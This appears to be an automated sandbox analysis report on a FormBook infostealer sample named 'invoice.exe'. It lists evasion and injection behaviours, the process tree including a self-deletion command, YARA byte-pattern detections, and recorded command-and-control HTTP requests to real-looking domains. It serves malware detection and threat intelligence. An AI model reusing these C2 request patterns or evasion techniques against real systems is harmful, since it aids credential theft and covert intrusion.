Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report invoice.exe

Overview

General Information

Sample Name:invoice.exe
Analysis ID:321016
MD5:c11b21f5c4adcab958c7706cd38f5697
SHA1:9112cb83359d88fde19f16290020fe813ba46b46
SHA256:ca31bf22e81cd78167c74ed368d9e6ffd06a189dacf22e4b007bcb452f5636d4
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • invoice.exe (PID: 5872 cmdline: 'C:\Users\user\Desktop\invoice.exe' MD5: C11B21F5C4ADCAB958C7706CD38F5697)
    • invoice.exe (PID: 4284 cmdline: C:\Users\user\Desktop\invoice.exe MD5: C11B21F5C4ADCAB958C7706CD38F5697)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6880 cmdline: /c del 'C:\Users\user\Desktop\invoice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.invoice.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.invoice.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.invoice.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        0.2.invoice.exe.29d0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.invoice.exe.29d0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: invoice.exeJoe Sandbox ML: detected
          Source: 0.2.invoice.exe.29d0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.invoice.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then pop ebx1_2_00407AD7
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then pop ebx1_2_00407A9C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then pop edi1_2_00416CA6
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi6_2_02396CA6

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49764
          Source: global trafficHTTP traffic detected: GET /saf0/?UnSpxn_=BtLohM+uB3q4k/LlKf4h6h9jKhMOWhQYAUT20pwPFuxXeQimTiRkUGHppPy1CbtFE5UV&nHux40=pRmTZBcPIFQHkvP0 HTTP/1.1Host: www.laborexchanges.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxNJURkYQ12iJDSWINmeiyVLwn1GCX+dbx HTTP/1.1Host: www.rmcfoods.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /saf0/?UnSpxn_=KK0m7Tuk2BKDUiTVJC/eZPZggliL1QGXIKfUCxB6Gg0A7hnmP0tvgutH2fljjdRiWXxo&nHux40=pRmTZBcPIFQHkvP0 HTTP/1.1Host: www.nigeriamoney.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: C:\Windows\explorer.exeCode function: 4_2_06C017A2 getaddrinfo,setsockopt,recv,4_2_06C017A2
          Source: global trafficHTTP traffic detected: GET /saf0/?UnSpxn_=BtLohM+uB3q4k/LlKf4h6h9jKhMOWhQYAUT20pwPFuxXeQimTiRkUGHppPy1CbtFE5UV&nHux40=pRmTZBcPIFQHkvP0 HTTP/1.1Host: www.laborexchanges.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxNJURkYQ12iJDSWINmeiyVLwn1GCX+dbx HTTP/1.1Host: www.rmcfoods.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /saf0/?UnSpxn_=KK0m7Tuk2BKDUiTVJC/eZPZggliL1QGXIKfUCxB6Gg0A7hnmP0tvgutH2fljjdRiWXxo&nHux40=pRmTZBcPIFQHkvP0 HTTP/1.1Host: www.nigeriamoney.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.montesida.com
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.666096636.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000006.00000002.925130650.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: https://www.rmcfoods.com/saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxN

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: invoice.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: invoice.exe
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041A050 NtClose,1_2_0041A050
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041A100 NtAllocateVirtualMemory,1_2_0041A100
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00419F20 NtCreateFile,1_2_00419F20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00419FD0 NtReadFile,1_2_00419FD0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041A0FA NtAllocateVirtualMemory,1_2_0041A0FA
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00419F1A NtCreateFile,1_2_00419F1A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00419FCB NtReadFile,1_2_00419FCB
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F198F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00F198F0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00F19860
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19840 NtDelayExecution,LdrInitializeThunk,1_2_00F19840
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F199A0 NtCreateSection,LdrInitializeThunk,1_2_00F199A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00F19910
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19A50 NtCreateFile,LdrInitializeThunk,1_2_00F19A50
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19A20 NtResumeThread,LdrInitializeThunk,1_2_00F19A20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00F19A00
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F195D0 NtClose,LdrInitializeThunk,1_2_00F195D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19540 NtReadFile,LdrInitializeThunk,1_2_00F19540
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F196E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00F196E0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00F19660
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F197A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00F197A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19780 NtMapViewOfSection,LdrInitializeThunk,1_2_00F19780
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19710 NtQueryInformationToken,LdrInitializeThunk,1_2_00F19710
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F198A0 NtWriteVirtualMemory,1_2_00F198A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F1B040 NtSuspendThread,1_2_00F1B040
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19820 NtEnumerateKey,1_2_00F19820
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F199D0 NtCreateProcessEx,1_2_00F199D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19950 NtQueueApcThread,1_2_00F19950
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19A80 NtOpenDirectoryObject,1_2_00F19A80
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19A10 NtQuerySection,1_2_00F19A10
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F1A3B0 NtGetContextThread,1_2_00F1A3B0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19B00 NtSetValueKey,1_2_00F19B00
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F195F0 NtQueryInformationFile,1_2_00F195F0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19560 NtWriteFile,1_2_00F19560
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F1AD30 NtSetContextThread,1_2_00F1AD30
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19520 NtWaitForSingleObject,1_2_00F19520
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F196D0 NtCreateKey,1_2_00F196D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19670 NtQueryInformationProcess,1_2_00F19670
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19650 NtQueryValueKey,1_2_00F19650
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19610 NtEnumerateValueKey,1_2_00F19610
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F19FE0 NtCreateMutant,1_2_00F19FE0
          Source: C:\Windows\explorer.exeCode function: 4_2_06C00A52 NtCreateFile,4_2_06C00A52
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479540 NtReadFile,LdrInitializeThunk,6_2_04479540
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044795D0 NtClose,LdrInitializeThunk,6_2_044795D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479650 NtQueryValueKey,LdrInitializeThunk,6_2_04479650
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04479660
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044796D0 NtCreateKey,LdrInitializeThunk,6_2_044796D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044796E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_044796E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479710 NtQueryInformationToken,LdrInitializeThunk,6_2_04479710
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479FE0 NtCreateMutant,LdrInitializeThunk,6_2_04479FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479780 NtMapViewOfSection,LdrInitializeThunk,6_2_04479780
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479840 NtDelayExecution,LdrInitializeThunk,6_2_04479840
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04479860
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04479910
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044799A0 NtCreateSection,LdrInitializeThunk,6_2_044799A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479A50 NtCreateFile,LdrInitializeThunk,6_2_04479A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479560 NtWriteFile,6_2_04479560
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479520 NtWaitForSingleObject,6_2_04479520
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0447AD30 NtSetContextThread,6_2_0447AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044795F0 NtQueryInformationFile,6_2_044795F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479670 NtQueryInformationProcess,6_2_04479670
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479610 NtEnumerateValueKey,6_2_04479610
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479760 NtOpenProcess,6_2_04479760
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0447A770 NtOpenThread,6_2_0447A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479770 NtSetInformationFile,6_2_04479770
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0447A710 NtOpenProcessToken,6_2_0447A710
